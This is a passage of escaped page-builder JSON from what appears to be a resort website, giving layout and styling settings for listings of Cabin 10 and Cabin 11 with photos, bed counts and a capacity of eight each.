map)<\\/a><\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a763503\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3f28486\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"76a9305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ec644e\"}]},\"elements\":[{\"id\":\"c20b05e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d36d555\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b3d4418\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bc32c7b\"}]},\"elements\":[{\"id\":\"44df606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 10\",\"title_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25a558f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-001.jpg\",\"id\":286}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5430be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom , 1 bath<\\/strong><\\/p><p><strong>2\\u00a0queen beds, 1 double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"666a77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3c6e3e6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3cf59d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"69505cd\"}]},\"elements\":[{\"id\":\"ec73946\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 11\",\"title_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c5f5023\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/cabin11.jpg\",\"id\":282},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a9b3aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-1-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"6\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom, 1 bath<\\/strong><\\/p><p><strong>\\u00a02 queen\\u00a0beds, 1\\u00a0double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\